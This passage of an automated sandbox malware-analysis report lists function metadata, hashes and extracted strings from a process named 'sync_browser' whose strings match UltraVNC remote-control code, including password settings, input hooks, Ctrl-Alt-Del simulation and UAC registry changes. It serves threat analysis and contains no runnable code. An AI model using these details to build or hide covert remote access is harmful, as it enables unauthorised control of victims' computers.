                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep_errno
                                                    • String ID:
                                                    • API String ID: 1068366078-0
                                                    • Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                    • Instruction ID: 2b8c694280347533f5535840f8284e79a1ddf5e35409f063f35b9f497a1f16ac
                                                    • Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
                                                    • Instruction Fuzzy Hash: 1B016222A24A9586EB58AB17984046DF7A5EBC8FD0BD91172DE5D03B94CF3CE891C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
                                                    • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                    • API String ID: 634683900-3478490838
                                                    • Opcode ID: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                    • Instruction ID: b22e14310bfb848fdfd4e2874df0e353468ed9480b1e3f0cbe6d1a3effc7deaf
                                                    • Opcode Fuzzy Hash: 2effa7899f974a3009ccd12de8866d22f8568e5a4afa6748285aa8aa378eceda
                                                    • Instruction Fuzzy Hash: F8E2DA75618A6BD6EB14AF64E850DECAB20FF85B48FC05033D91D57928DE7CE20AC760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
                                                    • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                    • API String ID: 341937111-959611688
                                                    • Opcode ID: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
                                                    • Instruction ID: fe36d863d6eaf238ad951447a615f62b529496d85b5f8f8d80c4db0e54547e16
                                                    • Opcode Fuzzy Hash: 7e73647ecd3fa51fa072c6accf7da39f2f963580055068ff331c9971e3f9d7f8
                                                    • Instruction Fuzzy Hash: 76C2EB65A1892797EA04AB65E850CADAB60FFC5F88FC05433DD1D53928EE7CE209C770
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$Library$Event$DesktopThread$LoadMessageWindow$CreateFileFreeModuleNameObject$CloseCriticalDestroySectionTimer$ClassClipboardCombineCurrentDeleteDispatchEnterHandleInformationInputKillLeaveLongOpenPeekRectRegisterSleepStockTranslateUserViewerWaitfree
                                                    • String ID: CaptureW8$ChangeWindowMessageFilter$SetHook$SetHooks$SetKeyboardFilterHook$SetMouseFilterHook$StartW8$StopW8$UnSetHook$UnSetHooks$WinVNC$WinVNC desktop sink$\schook64.dll$\vnchooks.dll$\w8hook64.dll$user32.dll$vncdesktopsink.cpp : InitWindow called$vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation $vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error $vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK$vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x$vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop $vncdesktopsink.cpp : OOOOOOOOOOOO %i %i$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4$vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch$vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's$vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch$vncdesktopsink.cpp : REct3 %i %i %i %i $vncdesktopsink.cpp : RFB_MOUSE_UPDATE $vncdesktopsink.cpp : RFB_SCREEN_UPDATE $vncdesktopsink.cpp : failed to create hook window$vncdesktopsink.cpp : failed to register window class$vnchook
                                                    • API String ID: 3632263120-2889214834
                                                    • Opcode ID: 7f86bcf90ac23ed3313e68ce7d85e9fffed402d6815da712985dc0a1a31e7d51
                                                    • Instruction ID: a6680d7c37a223299d7713629fe7d9d50725859da7b889c2b5e645a3adee6e30
                                                    • Opcode Fuzzy Hash: 7f86bcf90ac23ed3313e68ce7d85e9fffed402d6815da712985dc0a1a31e7d51
                                                    • Instruction Fuzzy Hash: 48527131A08AA686EB48EF64E854AADB7A8FF88B48FC10537DD4D53654DF3CE544C360
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ************** DEAD KEY$ Compose dead 0x%x 0x%x$ Composed 0x%x$ Found key$ SHORT s %i$ Simulating ALT+%d%d%d$ keysym 0x%x$CAD$Not Vista and runnning as system, use old method$Not Vista and runnning as user -> Taskmgr$Vista and runnning as system -> CAD$Vista and runnning as user -> Taskmgr$down$fake %d down$fake %d up$gfff$ignoring unknown keysym %d$ignoring unrecognised Latin-1 keysym 0x%x$latin-1 key: keysym %d(0x%x) vkCode 0x%x down %d capslockOn %d$taskmgr.exe
                                                    • API String ID: 0-2541672151
                                                    • Opcode ID: 4de62e545ccc4938766ca3ab5845fa14ab1c878863e4d7865b5c773306dab41b
                                                    • Instruction ID: 854eafd79686ace50eeee12e99a5cffeef547a3f0fc27dbec8dc2a4fc4980781
                                                    • Opcode Fuzzy Hash: 4de62e545ccc4938766ca3ab5845fa14ab1c878863e4d7865b5c773306dab41b
                                                    • Instruction Fuzzy Hash: 50529E61E1869287FB18BB24D810BBEAB61BF80B49FC04437DD4E576A5DF3CA549C360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                    • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                    • API String ID: 1732492099-311746058
                                                    • Opcode ID: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                    • Instruction ID: 396ec2836e5b8d18447996ab8620954335aad3edc6c42fdf9035cd36aeeded83
                                                    • Opcode Fuzzy Hash: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                    • Instruction Fuzzy Hash: 3FF19E32A08B5287EB14AB25E8446ADB7A5FF84B58FC40237DE5D47AA4DF3CE504C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
                                                    • String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
                                                    • API String ID: 767217470-2348971971
                                                    • Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                    • Instruction ID: 90ea60f3d07233164ea40eee1cb141fe13de2f6f8ff31e54abf408ff7c328b47
                                                    • Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                    • Instruction Fuzzy Hash: 88C19E21A19A6287FE58ABA5A850A7DABA4FFC4F54FC41137CD5E13694CF3CE845C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
                                                    • String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
                                                    • API String ID: 3851920378-1343955350
                                                    • Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                    • Instruction ID: 58458782ac67c0f866255c93ad7df84c801b8c65464eeeb023c2756ab08bcb89
                                                    • Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                    • Instruction Fuzzy Hash: D7023872A086D286EB14AF64D440AADABA1FF89F58FC84437DE4D5B698DF38D015C730
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
                                                    • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                    • API String ID: 4207610217-3713657650
                                                    • Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                    • Instruction ID: 98fdb119c10b680a49d05d2899b564b044df4da4a79898401f0283db86afbcaa
                                                    • Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                    • Instruction Fuzzy Hash: EAC1A562A19A8386EB54AB24E4106BEA7A4FF84F88FC04137DE4D57A58DF7CD505C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Item$ProcessText$DialogForeground$CurrentLongMessageThreadsprintf$ActiveBeepDeleteFileFlashImageLoadModuleNameObjectPrivateProfileSendStringTimer
                                                    • String ID: AutoAccept: %u$AutoAccept:%u$AutoReject: %u$AutoReject:%u$\mylogo.bmp$accept_reject_mesg$admin
                                                    • API String ID: 384463373-239428621
                                                    • Opcode ID: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                    • Instruction ID: 353ad1d7b94356a7ab6ffe2abf3865df0211a06d218a66dddcc6df7ac5409f3e
                                                    • Opcode Fuzzy Hash: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                    • Instruction Fuzzy Hash: EEB1B421A18A5287E768AB24E8046BEA7A1FFC4F95FC44133DE4E17694DF3CE845C724
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
                                                    • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                    • API String ID: 27940619-3388178877
                                                    • Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                    • Instruction ID: cf31c6ecd139baba16d71a8dfc5dcc840f5d148b58537ae3dac0a2848bb68e32
                                                    • Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                    • Instruction Fuzzy Hash: EFC1A132A186928BEB14EF25A4506BEB7A1FF84B98FC44036EE4D57694DF3CD905C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
